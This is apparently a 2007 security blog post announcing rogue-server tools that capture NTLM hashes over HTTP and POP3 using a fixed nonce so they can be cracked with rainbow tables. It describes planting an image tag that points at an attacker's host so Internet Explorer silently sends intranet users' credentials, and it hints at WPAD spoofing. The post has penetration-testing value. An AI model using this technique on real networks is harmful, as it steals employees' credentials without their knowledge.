Catching NTLM Hashes Like Pokemons!

NTLM Hashes?

NTLM hashes are awesome. In some cases you don't need to do anything to them after you grab 'em, just put them in a program or script and pull the trigger - pass the hash it's called. Instant authentication, no Rainbow Tables or cracking required!

The attacks here don't provide the raw hash unfortunately. But by acting as a rogue server we can send a pre-defined nonce that Rainbow Tables have already been generated. (or at least the first half of the LanMan hash). When you don't have a lot to begin with, collecting nearly the entire corporate's hashes for cracking is an amazing start.

About NTLM Type Messages

Microsoft's authentication protocol negotiates each side's capabilities and, based upon supported features, sends the user's credentials. Protocols like HTTP(S), IMAP, POP3 and SMTP that were already predefined and 7-bit based required a little extension to support Microsoft's transparent authentication. This is where Type Messages come in. They're Base64-encoded strings of the protocol, transmitted instead of the standard authentication routines.

Some documents that describe the NTLM Type Message formats:

http://davenport.sourceforge.net/ntlm.html (Local Copy) - A very good doc
http://www.innovation.ch/personal/ronald/ntlm.html - (Local Copy) - Early doc

Gotta Catch 'em All!

Requirements: Ruby and the Metasploit SVN trunk. Place the code in your main trunk directory and execute.

HTTP!

PokeHashBall for HTTP - Version 1.0, collects the hashes with a pre-defined nonce! Proxy-based relay version coming soon.

Microsoft's support for transparent auth in HTTP is done by sending HTTP/401 Error pages with WWW-Authenticate: NTLM headers. Version 1.0 provides a pre-defined nonce and forces LMv1/NTLMv1 authentication only. This provides capture and crack of LM and NTLM hashes.

Follow this scenario for a second -- you have access to an internal corporate page, a classifieds site, the corporate e-mail is Outlook, you get the picture. Using some prior information such as the Windows domain name (easy to find) you run pokehashball-http and send/place an <img src="http://rogueservername/a.gif"> link. As long as IE believes you're on the Intranet (see KB Article 258063 for info) it will SILENTLY negotiate and transmit the user's authentication. Victory!

Other methods? How about naming your machine "WPAD"? :)

QuickTime vid of PokeHashBall-HTTP in action

IMAP/POP3/SMTP

POP3 - Psyduck-pop3.rb
Others coming soon

Changelog:

Oct 14, 07 - Firstpost!
Nov 15, 07 - adding POP3